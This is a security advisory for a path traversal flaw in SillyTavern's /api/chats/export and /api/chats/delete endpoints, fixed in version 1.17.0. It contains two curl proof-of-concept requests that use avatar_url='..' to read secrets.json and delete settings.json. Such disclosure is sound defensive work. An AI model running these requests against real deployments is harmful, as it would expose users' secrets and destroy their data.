Launch Week Day 1: Announcing Security Design Review
Start for Free
HIGH 8.3 npm

SillyTavern: Path Traversal in `/api/chats/export` and `/api/chats/delete` allows arbitrary file read/delete within user data root

GHSA-vprr-q85p-79mf · CVE-2026-34524

Published · Modified

Description

Summary

A Path Traversal vulnerability in chat endpoints allows an authenticated attacker to read and delete arbitrary files under their user data root (for example secrets.json and settings.json) by supplying avatar_url="..".

Details

The input validator used by avatar_url blocks only / and NUL bytes, but does not block traversal segments like ...

Evidence:

Because avatar_url=".." is accepted, path.join(<user>/chats, "..") resolves to <user>/, enabling direct access to files outside the chats directory.

PoC

Prerequisites:

  • Valid authenticated session cookie (cookie.txt)
  • Valid CSRF token ($TOKEN)

Read sensitive file (secrets.json):

curl -b cookie.txt -H "x-csrf-token: $TOKEN" -H "content-type: application/json" \
  -d '{"avatar_url":"..","is_group":false,"file":"secrets.json","format":"jsonl","exportfilename":"x"}' \
  http://TARGET:8000/api/chats/export

Delete sensitive file (settings.json):

curl -b cookie.txt -H "x-csrf-token: $TOKEN" -H "content-type: application/json" \
  -d '{"avatar_url":"..","chatfile":"settings.json"}' \
  http://TARGET:8000/api/chats/delete

Impact

  • Confidentiality: exposed per-user secrets and config data.
  • Integrity/Availability: attacker can delete critical per-user files and break account operation.
  • Risk is significant in multi-user or remotely reachable deployments.

Resolution

The issue was addressed in version 1.17.0

References

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes